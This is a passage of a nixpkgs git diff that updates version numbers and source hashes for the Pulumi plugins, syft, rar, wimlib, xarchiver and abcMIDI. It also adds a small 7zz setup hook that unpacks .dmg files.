"05x8allllb6spjkjf9lchk1pyprj356s0kgy2rdz24knvr2rxr3r"; } { - url = "https://api.pulumi.com/releases/plugins/pulumi-resource-alicloud-v3.49.0-darwin-amd64.tar.gz"; - sha256 = "1yd1s42lnjmz02i5kplxa0x6qk80m20f0x1dypxnbrjnghj05fcq"; + url = "https://api.pulumi.com/releases/plugins/pulumi-resource-alicloud-v3.49.1-darwin-amd64.tar.gz"; + sha256 = "08ji9qkl1njci37a2hsvi5gj28x986a4xlkc7z9y2n0vzr9cy3rl"; } { url = "https://api.pulumi.com/releases/plugins/pulumi-resource-artifactory-v6.1.4-darwin-amd64.tar.gz"; @@ -187,20 +187,20 @@ sha256 = "1wlw4lvdy63fw2vpv0cg3g5ffy1frr8dfbvnr1avashw1bvmh6yd"; } { - url = "https://api.pulumi.com/releases/plugins/pulumi-resource-aws-v6.23.0-darwin-amd64.tar.gz"; - sha256 = "1wv0m7lbrpiwn5a9d96kh37zf8vp23sf25kyx3gxd2khx3g2s0ww"; + url = "https://api.pulumi.com/releases/plugins/pulumi-resource-aws-v6.24.0-darwin-amd64.tar.gz"; + sha256 = "0zbappmx8za45nn0pn2vwab5z7zbx0yw2bfrlnpnmq6bflgv9mg2"; } { - url = "https://api.pulumi.com/releases/plugins/pulumi-resource-azuread-v5.47.1-darwin-amd64.tar.gz"; - sha256 = "1hkkjqm5b8mnzvgkjzz3zkq86wzbi89n1i19l9jy57pbr6mr2kkk"; + url = "https://api.pulumi.com/releases/plugins/pulumi-resource-azuread-v5.47.2-darwin-amd64.tar.gz"; + sha256 = "1bjvbqdhd49ayxcv60rii4y3ngafjfzz0w9flra9wkh8hv8z1xxz"; } { url = "https://api.pulumi.com/releases/plugins/pulumi-resource-azuredevops-v2.15.0-darwin-amd64.tar.gz"; sha256 = "11whky196lqgj8bgzxixd1m39jqw3fs9if8knmwcr7zmd3jyf80w"; } { - url = "https://api.pulumi.com/releases/plugins/pulumi-resource-azure-v5.67.0-darwin-amd64.tar.gz"; - sha256 = "1v3bqv5yf8ixfag8bshhhyq9wi1viys6r2c6hg26nw56i6g5i951"; + url = "https://api.pulumi.com/releases/plugins/pulumi-resource-azure-v5.67.1-darwin-amd64.tar.gz"; + sha256 = "05ll4cbmvc61jx15y37n79bslqkxc5879kjg4i86l3cldgmazjdi"; } { url = "https://api.pulumi.com/releases/plugins/pulumi-resource-cloudflare-v5.21.0-darwin-amd64.tar.gz"; @@ -231,8 +231,8 @@ sha256 = "03xk7hkcs0f8684ll7f7z7z14zwj66qnps0pcsd7r34s7qyhy33g"; } { - url = "https://api.pulumi.com/releases/plugins/pulumi-resource-gcp-v7.11.0-darwin-amd64.tar.gz"; - sha256 = "1j0fkc2g8jbd07cc2s1v88psg01pgiqmdf3hph0zv67qsymfi5w8"; + url = "https://api.pulumi.com/releases/plugins/pulumi-resource-gcp-v7.11.2-darwin-amd64.tar.gz"; + sha256 = "1s08pdqba2i81ijm4bm6qm4a1biy53hrxv964l9gv5gf45jm3md7"; } { url = "https://api.pulumi.com/releases/plugins/pulumi-resource-github-v6.0.0-darwin-amd64.tar.gz"; @@ -251,32 +251,32 @@ sha256 = "18w9x6ym08ljr71kl82qb017cxzfbpkhbvljb1ki8nrk32s7rljy"; } { - url = "https://api.pulumi.com/releases/plugins/pulumi-resource-kubernetes-v4.8.0-darwin-amd64.tar.gz"; - sha256 = "0rylnwf2500iw2dkigs3jrxpjvvxs1b0vh6z2kv4l8xlfb47r2rn"; + url = "https://api.pulumi.com/releases/plugins/pulumi-resource-kubernetes-v4.8.1-darwin-amd64.tar.gz"; + sha256 = "0r76x8339mdlmi7d4sxfnz3lisj5gsscdckv7ca8i5zs288yifhv"; } { - url = "https://api.pulumi.com/releases/plugins/pulumi-resource-linode-v4.14.0-darwin-amd64.tar.gz"; - sha256 = "1ij1j34321pa7x7cxb2lpcdakqgwnfvfh9jpbr1zgs5fqvi7ya1c"; + url = "https://api.pulumi.com/releases/plugins/pulumi-resource-linode-v4.15.0-darwin-amd64.tar.gz"; + sha256 = "1zn2wz1adypy2cr8wl60rsry7m923zyyl2kkf19j5326rbxhki37"; } { url = "https://api.pulumi.com/releases/plugins/pulumi-resource-mailgun-v3.5.1-darwin-amd64.tar.gz"; sha256 = "063jm09bpshlc86svwacafjbc6iv09n81jx4hmcwwgcic6pwb1ic"; } { - url = "https://api.pulumi.com/releases/plugins/pulumi-resource-mysql-v3.2.1-darwin-amd64.tar.gz"; - sha256 = "0457whyfc8vkq4jpd2z1sfwxsbdlbx6dzcr1kqf799xb1k049bwj"; + url = "https://api.pulumi.com/releases/plugins/pulumi-resource-mysql-v3.2.3-darwin-amd64.tar.gz"; + sha256 = "1hrc3lrn7ry6p44f0d287z5nw754rwk0xlhr8zj5vx3xyx8jws34"; } { url = "https://api.pulumi.com/releases/plugins/pulumi-resource-openstack-v3.15.1-darwin-amd64.tar.gz"; sha256 = "1wcripnsgxwlj7s6mv726kxrf689xlc7zxqmra5a1zdmfqskmq4k"; } { - url = "https://api.pulumi.com/releases/plugins/pulumi-resource-postgresql-v3.10.1-darwin-amd64.tar.gz"; - sha256 = "1ndpj3mpxbhpvj29x1a61jj2hqk6v9ysmrb87gd6a30rafs9r7fc"; + url = "https://api.pulumi.com/releases/plugins/pulumi-resource-postgresql-v3.11.0-darwin-amd64.tar.gz"; + sha256 = "1lp9ga9yzz52dnpw3im32d5g8pai42wnj3c3r7acb48ndy2xw9g7"; } { - url = "https://api.pulumi.com/releases/plugins/pulumi-resource-random-v4.15.1-darwin-amd64.tar.gz"; - sha256 = "00m5f757fk01wkqf3ji4d0yjmk7i4b3sglgws3mgr5j1waswy4jw"; + url = "https://api.pulumi.com/releases/plugins/pulumi-resource-random-v4.16.0-darwin-amd64.tar.gz"; + sha256 = "0xgcvika75bbyaabjxi1jzmv0w86i0nzixfc50x4crz0969qncz4"; } { url = "https://api.pulumi.com/releases/plugins/pulumi-resource-snowflake-v0.49.0-darwin-amd64.tar.gz"; @@ -291,8 +291,8 @@ sha256 = "01f6c3zgmlmips4b5ysdp2vyflykq9bi1r1pbmqh05b6j35r90km"; } { - url = "https://api.pulumi.com/releases/plugins/pulumi-resource-tailscale-v0.14.0-darwin-amd64.tar.gz"; - sha256 = "01f9lq4javm9fw87xclz44yq8iwa47fxz23fws694a0lsl0ki33m"; + url = "https://api.pulumi.com/releases/plugins/pulumi-resource-tailscale-v0.15.0-darwin-amd64.tar.gz"; + sha256 = "10skdrdb9dsd4pkamwihf73laaif90dkfl8ixi6irf30rqihc2nf"; } { url = "https://api.pulumi.com/releases/plugins/pulumi-resource-tls-v5.0.1-darwin-amd64.tar.gz"; @@ -303,8 +303,8 @@ sha256 = "1wgdn8zv3q4fn6730jfyb5x7rmb460plc4iddlsibnwnx0w5c3s5"; } { - url = "https://api.pulumi.com/releases/plugins/pulumi-resource-venafi-v1.6.3-darwin-amd64.tar.gz"; - sha256 = "04w6xmnqivc34grfgh3hqi9zp7ibsrrc2v0v102zh0sxn7lbksc6"; + url = "https://api.pulumi.com/releases/plugins/pulumi-resource-venafi-v1.7.0-darwin-amd64.tar.gz"; + sha256 = "1pvbcyw1l2b27hn48klc2fj3is2y3z1dj90ac4kkqi2ag4xj45vx"; } { url = "https://api.pulumi.com/releases/plugins/pulumi-resource-vsphere-v4.9.2-darwin-amd64.tar.gz"; @@ -321,8 +321,8 @@ ]; aarch64-linux = [ { - url = "https://get.pulumi.com/releases/sdk/pulumi-v3.107.0-linux-arm64.tar.gz"; - sha256 = "14n3i99vyqnbab7glaa80f3irlw0x5di2fawbbqan3fzc2j46z9c"; + url = "https://get.pulumi.com/releases/sdk/pulumi-v3.108.1-linux-arm64.tar.gz"; + sha256 = "0qf4lbldkc04jx13a4fdn6i2s1wfsa8x9c74fzplk75mwkv3fk1z"; } { url = "https://api.pulumi.com/releases/plugins/pulumi-resource-aiven-v6.12.0-linux-arm64.tar.gz"; @@ -333,8 +333,8 @@ sha256 = "0kb7hdciy8i91kmfndriav7sm05r1jkam7i634b5r6d7agdlvr2h"; } { - url = "https://api.pulumi.com/releases/plugins/pulumi-resource-alicloud-v3.49.0-linux-arm64.tar.gz"; - sha256 = "14x57ja726wb0kiwqdva6fk3jjd974apjqsq8i3nwkx6rrr91hvy"; + url = "https://api.pulumi.com/releases/plugins/pulumi-resource-alicloud-v3.49.1-linux-arm64.tar.gz"; + sha256 = "0r69ar70k0zyglyxh9v2ilv5xiks9dqfqi0fvy8lc8zkgrcwfb19"; } { url = "https://api.pulumi.com/releases/plugins/pulumi-resource-artifactory-v6.1.4-linux-arm64.tar.gz"; @@ -345,20 +345,20 @@ sha256 = "14wplnr5axic2a9skx0y6rjq8si02qwpadpcl978vchll0f4g1pz"; } { - url = "https://api.pulumi.com/releases/plugins/pulumi-resource-aws-v6.23.0-linux-arm64.tar.gz"; - sha256 = "04px1q2s7y97aw09j7s8n6yr6ysbhrly839vg6mag98g1b2ikz9p"; + url = "https://api.pulumi.com/releases/plugins/pulumi-resource-aws-v6.24.0-linux-arm64.tar.gz"; + sha256 = "15q20as4nmrcxf5dg4ahz3x4ffsnmzi6fcaiv9qn8ln30r5cvf98"; } { - url = "https://api.pulumi.com/releases/plugins/pulumi-resource-azuread-v5.47.1-linux-arm64.tar.gz"; - sha256 = "1rn6w2740zjcazrxy8h5f2g7mz17wvmnbyld7qm3zadn6rx4dipr"; + url = "https://api.pulumi.com/releases/plugins/pulumi-resource-azuread-v5.47.2-linux-arm64.tar.gz"; + sha256 = "0pzbsz7c6q9x3xfpcc8yb6d14hk514yr03p3nfsvmp2nb7224r6s"; } { url = "https://api.pulumi.com/releases/plugins/pulumi-resource-azuredevops-v2.15.0-linux-arm64.tar.gz"; sha256 = "1fcpf2x9dlxk2s06pgvqwsmjpwlv47q666xpj6cmx9cybmnhgjn4"; } { - url = "https://api.pulumi.com/releases/plugins/pulumi-resource-azure-v5.67.0-linux-arm64.tar.gz"; - sha256 = "0zn6n92yf3kbp3z788db8gq1gnwsmrmnqijq9d1a4wn6a5fwdy04"; + url = "https://api.pulumi.com/releases/plugins/pulumi-resource-azure-v5.67.1-linux-arm64.tar.gz"; + sha256 = "1vzfdagcqm5im4zn7dlqhmz0wjk8aq59yplzqfif411g09zhnr6j"; } { url = "https://api.pulumi.com/releases/plugins/pulumi-resource-cloudflare-v5.21.0-linux-arm64.tar.gz"; @@ -389,8 +389,8 @@ sha256 = "1kf88g5jm3xr5b35is8h0rqxzy79az3s90givsnr7x6xmm6favqc"; } { - url = "https://api.pulumi.com/releases/plugins/pulumi-resource-gcp-v7.11.0-linux-arm64.tar.gz"; - sha256 = "06mbbzb4c999r7x3vvngqsm58h7g6r8sq4w1aqbb8brkhhfg3wfj"; + url = "https://api.pulumi.com/releases/plugins/pulumi-resource-gcp-v7.11.2-linux-arm64.tar.gz"; + sha256 = "0dp11yirgfr45pqbqva5zapcgzb7gsf53al389dnr00cizfihn1r"; } { url = "https://api.pulumi.com/releases/plugins/pulumi-resource-github-v6.0.0-linux-arm64.tar.gz"; @@ -409,32 +409,32 @@ sha256 = "1shra5wq8zx4l9b3sp6yklhi8hbd8r2ypay9nf4jgwnc6ppql102"; } { - url = "https://api.pulumi.com/releases/plugins/pulumi-resource-kubernetes-v4.8.0-linux-arm64.tar.gz"; - sha256 = "11i44aiqypn4x74m0x3w9h37k55dfdys2il9asxbfmkh4slmqc62"; + url = "https://api.pulumi.com/releases/plugins/pulumi-resource-kubernetes-v4.8.1-linux-arm64.tar.gz"; + sha256 = "10kk7m7nisd75nb0f689ldfprx56asxfsc785gsnssjjjhy40vvr"; } { - url = "https://api.pulumi.com/releases/plugins/pulumi-resource-linode-v4.14.0-linux-arm64.tar.gz"; - sha256 = "18mdgj637h4qrlsz3ryr5nf2dy59lji1mxfcy6cfrsapwdig9w3n"; + url = "https://api.pulumi.com/releases/plugins/pulumi-resource-linode-v4.15.0-linux-arm64.tar.gz"; + sha256 = "1alll2yq4h7qb2zc4n9pj9rvqv8mv5v9jrxgnrsw7mha3cnjysa4"; } { url = "https://api.pulumi.com/releases/plugins/pulumi-resource-mailgun-v3.5.1-linux-arm64.tar.gz"; sha256 = "1cz4xvvdj0kr63a2x21zbjm4viw92k2920ljnqsfv2wr2f03yk6s"; } { - url = "https://api.pulumi.com/releases/plugins/pulumi-resource-mysql-v3.2.1-linux-arm64.tar.gz"; - sha256 = "12smmvbqcdbnqr7r4vx1w3k77hn8l0z7lvb5i1f34fnybq1k3b81"; + url = "https://api.pulumi.com/releases/plugins/pulumi-resource-mysql-v3.2.3-linux-arm64.tar.gz"; + sha256 = "1czrp700a4sdlxij8xgsl595fzg1s0k3pwnrwa2bl41xws9p65zy"; } { url = "https://api.pulumi.com/releases/plugins/pulumi-resource-openstack-v3.15.1-linux-arm64.tar.gz"; sha256 = "17gbazfqs1f2m0h9awwqw14amxlxvl3zwhx3nbzh86my7gn3kjmv"; } { - url = "https://api.pulumi.com/releases/plugins/pulumi-resource-postgresql-v3.10.1-linux-arm64.tar.gz"; - sha256 = "0vkgdc0b76ngrd9vdsqx5rmlijxvdrkr1vkyisl81z73bgjyh9zp"; + url = "https://api.pulumi.com/releases/plugins/pulumi-resource-postgresql-v3.11.0-linux-arm64.tar.gz"; + sha256 = "0mrfh9mr825gj0gizviwihym8gisnx49lq1sff4128jgsfaq2snv"; } { - url = "https://api.pulumi.com/releases/plugins/pulumi-resource-random-v4.15.1-linux-arm64.tar.gz"; - sha256 = "10k9v7v9krjsk095cmk84w875bllkbjl19syiqiq19am66k9n8jj"; + url = "https://api.pulumi.com/releases/plugins/pulumi-resource-random-v4.16.0-linux-arm64.tar.gz"; + sha256 = "0fp9z7mfpprs4680s350wyys6a0jwx4s455jqr938zxnx8s3rhfg"; } { url = "https://api.pulumi.com/releases/plugins/pulumi-resource-snowflake-v0.49.0-linux-arm64.tar.gz"; @@ -449,8 +449,8 @@ sha256 = "0m07iydqlampsx2zdgliyqa5h1zwj42p865anak37i59j1cx7ash"; } { - url = "https://api.pulumi.com/releases/plugins/pulumi-resource-tailscale-v0.14.0-linux-arm64.tar.gz"; - sha256 = "1n4ywh7l77w4zjk8vpdhrp44f0hzpr5pbmnh89c5q5j5w0p5wwck"; + url = "https://api.pulumi.com/releases/plugins/pulumi-resource-tailscale-v0.15.0-linux-arm64.tar.gz"; + sha256 = "12b7k1d3jl2s6lg5izr38yaf8n1k7hd76pdy1d09wrv5l2hbn8zh"; } { url = "https://api.pulumi.com/releases/plugins/pulumi-resource-tls-v5.0.1-linux-arm64.tar.gz"; @@ -461,8 +461,8 @@ sha256 = "0irp9vqikmmgcgzkca2z9nnak8ih73bbhs5576sf7y4132f4wvjj"; } { - url = "https://api.pulumi.com/releases/plugins/pulumi-resource-venafi-v1.6.3-linux-arm64.tar.gz"; - sha256 = "19xsgfb302nx6mcq4pninq66i7926r0dl2qdcvmsj6qbm83bdih4"; + url = "https://api.pulumi.com/releases/plugins/pulumi-resource-venafi-v1.7.0-linux-arm64.tar.gz"; + sha256 = "017ff9x7s4yvsrf4ypsyaz934r9jm954080gn5535w1694k96wbn"; } { url = "https://api.pulumi.com/releases/plugins/pulumi-resource-vsphere-v4.9.2-linux-arm64.tar.gz"; @@ -479,8 +479,8 @@ ]; aarch64-darwin = [ { - url = "https://get.pulumi.com/releases/sdk/pulumi-v3.107.0-darwin-arm64.tar.gz"; - sha256 = "1bm1mnzi9xlh5yqqvfixb18c1pqajs6x7r96wafxj5097476cam1"; + url = "https://get.pulumi.com/releases/sdk/pulumi-v3.108.1-darwin-arm64.tar.gz"; + sha256 = "13qyf4cg3ksflx1ax5pzn1a75r9zk89a41ywp08s7vfacmmvm6ym"; } { url = "https://api.pulumi.com/releases/plugins/pulumi-resource-aiven-v6.12.0-darwin-arm64.tar.gz"; @@ -491,8 +491,8 @@ sha256 = "1b47n69nc5nicagwdxq793a6nmbrg15690i8q40nixcf7k48krai"; } { - url = "https://api.pulumi.com/releases/plugins/pulumi-resource-alicloud-v3.49.0-darwin-arm64.tar.gz"; - sha256 = "0vl8a1vf0n2xjk7k39b0w4plj0lj3rxqys2wjycxvkkp6kxfb6s9"; + url = "https://api.pulumi.com/releases/plugins/pulumi-resource-alicloud-v3.49.1-darwin-arm64.tar.gz"; + sha256 = "0vwpr8fawr8gag8nrsi0dl4vw0dczqa4rm5dflgf2v5gfdhclsd6"; } { url = "https://api.pulumi.com/releases/plugins/pulumi-resource-artifactory-v6.1.4-darwin-arm64.tar.gz"; @@ -503,20 +503,20 @@ sha256 = "17d3p29w4hd5lrpgmf9j17fwy4vx1cr84nlfci3rvfzzih1x62yl"; } { - url = "https://api.pulumi.com/releases/plugins/pulumi-resource-aws-v6.23.0-darwin-arm64.tar.gz"; - sha256 = "0r3kv95dmfr04iy7ha7x2akbj4mwjdqd3fzld0ysnlbnm37mkfg8"; + url = "https://api.pulumi.com/releases/plugins/pulumi-resource-aws-v6.24.0-darwin-arm64.tar.gz"; + sha256 = "1i9z6ifhz0han1wmjm6f3ywm6jqbfgaq1xrwf8vq9yph54is0ysq"; } { - url = "https://api.pulumi.com/releases/plugins/pulumi-resource-azuread-v5.47.1-darwin-arm64.tar.gz"; - sha256 = "1n2kvcd68hya0i8bkiciigrv621n9f0xc5y5wji09advh8cx8a4w"; + url = "https://api.pulumi.com/releases/plugins/pulumi-resource-azuread-v5.47.2-darwin-arm64.tar.gz"; + sha256 = "1zj37idg91anzx0hd6y2mshgl0bxc9ysfd4prgvj4drf92gwrx4g"; } { url = "https://api.pulumi.com/releases/plugins/pulumi-resource-azuredevops-v2.15.0-darwin-arm64.tar.gz"; sha256 = "1c7ycicwszn9fsaw81rn88kgm7b5i0hp9sxp92qxfn649x742c45"; } { - url = "https://api.pulumi.com/releases/plugins/pulumi-resource-azure-v5.67.0-darwin-arm64.tar.gz"; - sha256 = "1mdmrf663fys5g0haxsyqp725aba6kim1hws6jympcchnqpp0l7k"; + url = "https://api.pulumi.com/releases/plugins/pulumi-resource-azure-v5.67.1-darwin-arm64.tar.gz"; + sha256 = "0id3w5wsapr5jh879qmglymbjzhl2r0w6kjahm1zzwvlqc3vg66w"; } { url = "https://api.pulumi.com/releases/plugins/pulumi-resource-cloudflare-v5.21.0-darwin-arm64.tar.gz"; @@ -547,8 +547,8 @@ sha256 = "1pd2x157ljb8rgm1mawqvqb39n0101450syr43z1qjmhgws7gz74"; } { - url = "https://api.pulumi.com/releases/plugins/pulumi-resource-gcp-v7.11.0-darwin-arm64.tar.gz"; - sha256 = "1rvxpzjy6q8flly4vb8248gyf0bh4f25az9m1bk13pil20xadsmx"; + url = "https://api.pulumi.com/releases/plugins/pulumi-resource-gcp-v7.11.2-darwin-arm64.tar.gz"; + sha256 = "03njrkmia42i0sg6qp76n8ymch4jaql4lkx0ixiscdwzgbx4v03m"; } { url = "https://api.pulumi.com/releases/plugins/pulumi-resource-github-v6.0.0-darwin-arm64.tar.gz"; @@ -567,32 +567,32 @@ sha256 = "19zhkq9lppjj41ddhbk2fi5xrmmbgyk38mlzvkqfly9lwgbc18v3"; } { - url = "https://api.pulumi.com/releases/plugins/pulumi-resource-kubernetes-v4.8.0-darwin-arm64.tar.gz"; - sha256 = "0c0d5b2wn73wmf5gmslkzg6hxkj97abhlwx5ipdqnd591d6zfw3a"; + url = "https://api.pulumi.com/releases/plugins/pulumi-resource-kubernetes-v4.8.1-darwin-arm64.tar.gz"; + sha256 = "0sq72v8hshx4kwbzsp9dyg26p21cwz8y7dh5msaqlxwsqmsw62pc"; } { - url = "https://api.pulumi.com/releases/plugins/pulumi-resource-linode-v4.14.0-darwin-arm64.tar.gz"; - sha256 = "03bicis1q94jqhy4h3wyrqy059dx010fafmxnpmizxcn565hhpcs"; + url = "https://api.pulumi.com/releases/plugins/pulumi-resource-linode-v4.15.0-darwin-arm64.tar.gz"; + sha256 = "07wf92lhbjzxifdvzjss6hmphdllclzj3b7k7nda03pv90awsh79"; } { url = "https://api.pulumi.com/releases/plugins/pulumi-resource-mailgun-v3.5.1-darwin-arm64.tar.gz"; sha256 = "1d90jmcm98nlagaqlnjk8kz5dn35yp682rxkps5w0m2x2k48hqxm"; } { - url = "https://api.pulumi.com/releases/plugins/pulumi-resource-mysql-v3.2.1-darwin-arm64.tar.gz"; - sha256 = "1li9qyzqknpjlj2z3pfghji47xvhsl268p48pl2i1g99d4qkpbsc"; + url = "https://api.pulumi.com/releases/plugins/pulumi-resource-mysql-v3.2.3-darwin-arm64.tar.gz"; + sha256 = "1ss909lscg6diphzpgxkm2gylvj0nkyf4jzp422m94g6xcinfwhy"; } { url = "https://api.pulumi.com/releases/plugins/pulumi-resource-openstack-v3.15.1-darwin-arm64.tar.gz"; sha256 = "0dqvgmcpvv3h86licnmlswlj2dklj2sqr02wyc10srw8gddvysx5"; } { - url = "https://api.pulumi.com/releases/plugins/pulumi-resource-postgresql-v3.10.1-darwin-arm64.tar.gz"; - sha256 = "14dc917y4ddd35ib5d0c3swlm6vcsjs57g8zd5gx74vnfgvkbc3h"; + url = "https://api.pulumi.com/releases/plugins/pulumi-resource-postgresql-v3.11.0-darwin-arm64.tar.gz"; + sha256 = "0xx8mphabl1vvmmyb5ramlf6zvd32lx46f6hlmihh76zfajhc5ci"; } { - url = "https://api.pulumi.com/releases/plugins/pulumi-resource-random-v4.15.1-darwin-arm64.tar.gz"; - sha256 = "1gri8is4man0zgp3yg0dmfnk9fjhrg02zahlravscxpd4baycb6p"; + url = "https://api.pulumi.com/releases/plugins/pulumi-resource-random-v4.16.0-darwin-arm64.tar.gz"; + sha256 = "15zxfi82jqja0xzryb74pvcxnrbn6axrs98j463z248b5fbwc7b8"; } { url = "https://api.pulumi.com/releases/plugins/pulumi-resource-snowflake-v0.49.0-darwin-arm64.tar.gz"; @@ -607,8 +607,8 @@ sha256 = "041zjnywmpxa302igaszj0hd6k4qb455i2c0452rlfh9kj7k2sa5"; } { - url = "https://api.pulumi.com/releases/plugins/pulumi-resource-tailscale-v0.14.0-darwin-arm64.tar.gz"; - sha256 = "1c63r0mr4q51b7bsc60idbinz6f0irgcg4wl72qhinbrl8wgdwd9"; + url = "https://api.pulumi.com/releases/plugins/pulumi-resource-tailscale-v0.15.0-darwin-arm64.tar.gz"; + sha256 = "1mrjn3g55h77rjni6v2v0hz4csclfiy2wdx7gllnwbpgfcchlqr2"; } { url = "https://api.pulumi.com/releases/plugins/pulumi-resource-tls-v5.0.1-darwin-arm64.tar.gz"; @@ -619,8 +619,8 @@ sha256 = "0aidg913j23b7i018yqwgz1pcssgyrvyfhlwh0jbdxay66v8cdi9"; } { - url = "https://api.pulumi.com/releases/plugins/pulumi-resource-venafi-v1.6.3-darwin-arm64.tar.gz"; - sha256 = "16kaha5i49sr7m60c3ql9j0amp051z3yxrfpw18ksygshinii8cb"; + url = "https://api.pulumi.com/releases/plugins/pulumi-resource-venafi-v1.7.0-darwin-arm64.tar.gz"; + sha256 = "00qq53wirdjm8zqqisad34fzx70m96dwg0dqysz6nqikq620h7dp"; } { url = "https://api.pulumi.com/releases/plugins/pulumi-resource-vsphere-v4.9.2-darwin-arm64.tar.gz"; diff --git a/nixpkgs/pkgs/tools/admin/syft/default.nix b/nixpkgs/pkgs/tools/admin/syft/default.nix index 5ed4c5ec1e92..078220d33e32 100644 --- a/nixpkgs/pkgs/tools/admin/syft/default.nix +++ b/nixpkgs/pkgs/tools/admin/syft/default.nix @@ -2,13 +2,13 @@ buildGoModule rec { pname = "syft"; - version = "0.105.1"; + version = "1.0.1"; src = fetchFromGitHub { owner = "anchore"; repo = pname; rev = "v${version}"; - hash = "sha256-laseVMbgzKuVyF6PWpthtt3Wgv+WW5ccTjp0jj15nB0="; + hash = "sha256-/jfaVgavi3ncwbILJk5SCco1f2yC1R9MoFi+Bi6xohI="; # populate values that require us to use git. By doing this in postFetch we # can delete .git afterwards and maintain better reproducibility of the src. leaveDotGit = true; @@ -22,7 +22,7 @@ buildGoModule rec { }; # hash mismatch with darwin proxyVendor = true; - vendorHash = "sha256-u5leq9K9c31No6saMO5cK9futt4Wl4f/d6V2djC8T1w="; + vendorHash = "sha256-gXE75fAbWxQdTogvub9BRl7VJVVP2I3uwgDIJUmGIPQ="; nativeBuildInputs = [ installShellFiles ]; diff --git a/nixpkgs/pkgs/tools/archivers/7zz/default.nix b/nixpkgs/pkgs/tools/archivers/7zz/default.nix index 48b072b0cf4b..a10283dc59f8 100644 --- a/nixpkgs/pkgs/tools/archivers/7zz/default.nix +++ b/nixpkgs/pkgs/tools/archivers/7zz/default.nix @@ -99,6 +99,8 @@ stdenv.mkDerivation (finalAttrs: { nativeBuildInputs = lib.optionals useUasm [ uasm ]; + setupHook = ./setup-hook.sh; + enableParallelBuilding = true; preBuild = "cd CPP/7zip/Bundles/Alone2"; diff --git a/nixpkgs/pkgs/tools/archivers/7zz/setup-hook.sh b/nixpkgs/pkgs/tools/archivers/7zz/setup-hook.sh new file mode 100644 index 000000000000..97f2cc8a7694 --- /dev/null +++ b/nixpkgs/pkgs/tools/archivers/7zz/setup-hook.sh @@ -0,0 +1,5 @@ +unpackCmdHooks+=(_tryUnpackDmg) +_tryUnpackDmg() { + if ! [[ "$curSrc" =~ \.dmg$ ]]; then return 1; fi + 7zz x "$curSrc" +} diff --git a/nixpkgs/pkgs/tools/archivers/rar/default.nix b/nixpkgs/pkgs/tools/archivers/rar/default.nix index 168316813f76..3799afd736ef 100644 --- a/nixpkgs/pkgs/tools/archivers/rar/default.nix +++ b/nixpkgs/pkgs/tools/archivers/rar/default.nix @@ -6,25 +6,25 @@ }: let - version = "6.24"; + version = "7.00"; downloadVersion = lib.replaceStrings [ "." ] [ "" ] version; # Use `./update.sh` to generate the entries below srcs = { i686-linux = { url = "https://www.rarlab.com/rar/rarlinux-x32-${downloadVersion}.tar.gz"; - hash = "sha256-aacgJH0iJLRNEaZuVyzl/FxZgSnW3dIZFUfaqt0l88M="; + hash = "sha256-5y2BaclEKLUpZayqzilaLPcYi0dZkKpn99n5E+Z5lOo="; }; x86_64-linux = { url = "https://www.rarlab.com/rar/rarlinux-x64-${downloadVersion}.tar.gz"; - hash = "sha256-iOIqjoQSXJR2N7vyjHRuM4oKYyedgPn51zc2A4ddses="; + hash = "sha256-Hbv68alpeCbuHFLP36EGZ/9nE1ANlpJjg6h3Gz7u4iI="; }; aarch64-darwin = { url = "https://www.rarlab.com/rar/rarmacos-arm-${downloadVersion}.tar.gz"; - hash = "sha256-2r4zWDT7Xw/CNvA7oNEsGfrXJDzFa5gNthIB/5TYR5U="; + hash = "sha256-icfpbU/UkysY4Z2wHDMWy1FnuqYkDJeDkF8yUrZuMUM="; }; x86_64-darwin = { url = "https://www.rarlab.com/rar/rarmacos-x64-${downloadVersion}.tar.gz"; - hash = "sha256-4vENPNfMpQstsm9+8+glHPK9fAlDmnHWbCHW+HUwSX4="; + hash = "sha256-/ImdlFyCCKU1/1XluAxCz11lge7+EoIE1zjBL9c2IQc="; }; }; manSrc = fetchurl { diff --git a/nixpkgs/pkgs/tools/archivers/wimlib/default.nix b/nixpkgs/pkgs/tools/archivers/wimlib/default.nix index ee239a5a255f..6baf1ac89645 100644 --- a/nixpkgs/pkgs/tools/archivers/wimlib/default.nix +++ b/nixpkgs/pkgs/tools/archivers/wimlib/default.nix @@ -9,7 +9,7 @@ }: stdenv.mkDerivation rec { - version = "1.14.3"; + version = "1.14.4"; pname = "wimlib"; nativeBuildInputs = [ pkg-config makeWrapper ]; @@ -17,7 +17,7 @@ stdenv.mkDerivation rec { src = fetchurl { url = "https://wimlib.net/downloads/${pname}-${version}.tar.gz"; - hash = "sha256-ESjGx5FtLyLagDQfhNh9d8Yg3mUA+7I6dB+nm9CM0e8="; + hash = "sha256-NjPbK2yLJV64bTvz3zBZeWvR8I5QuMlyjH62ZmLlEwA="; }; enableParallelBuilding = true; diff --git a/nixpkgs/pkgs/tools/archivers/xarchiver/default.nix b/nixpkgs/pkgs/tools/archivers/xarchiver/default.nix index 9c0f4685fa0f..b8ab9827cbd9 100644 --- a/nixpkgs/pkgs/tools/archivers/xarchiver/default.nix +++ b/nixpkgs/pkgs/tools/archivers/xarchiver/default.nix @@ -2,14 +2,14 @@ coreutils, zip, unzip, p7zip, unar, gnutar, bzip2, gzip, lhasa, wrapGAppsHook }: stdenv.mkDerivation rec { - version = "0.5.4.22"; + version = "0.5.4.23"; pname = "xarchiver"; src = fetchFromGitHub { owner = "ib"; repo = "xarchiver"; rev = version; - sha256 = "sha256-wB1l1OcLK9rh6cpcDprXZBXLXRSwBFV9aueBI57kjJI="; + hash = "sha256-aNUpuePU6nmrralp+j8GgVPuxv9ayRVoKicPZkC4nTE="; }; nativeBuildInputs = [ intltool pkg-config makeWrapper wrapGAppsHook ]; diff --git a/nixpkgs/pkgs/tools/audio/abcmidi/default.nix b/nixpkgs/pkgs/tools/audio/abcmidi/default.nix index 15fd7b88b394..6a8d491480ea 100644 --- a/nixpkgs/pkgs/tools/audio/abcmidi/default.nix +++ b/nixpkgs/pkgs/tools/audio/abcmidi/default.nix @@ -2,11 +2,11 @@ stdenv.mkDerivation rec { pname = "abcMIDI"; - version = "2024.02.25"; + version = "2024.03.02"; src = fetchzip { url = "https://ifdo.ca/~seymour/runabc/${pname}-${version}.zip"; - hash = "sha256-xaVmK7q10gxN69bGsFEIc01izSbu1m6IyMJWBN6kSzA="; + hash = "sha256-LWVU6OZc4hTjYY7Q8zjlR4vMqRc2Y+8QGFST543FR1I="; }; meta = with lib; { diff --git a/nixpkgs/pkgs/tools/cd-dvd/dvd-vr/default.nix b/nixpkgs/pkgs/tools/cd-dvd/dvd-vr/default.nix index 88703b28b582..43aaa534c041 100644 --- a/nixpkgs/pkgs/tools/cd-dvd/dvd-vr/default.nix +++ 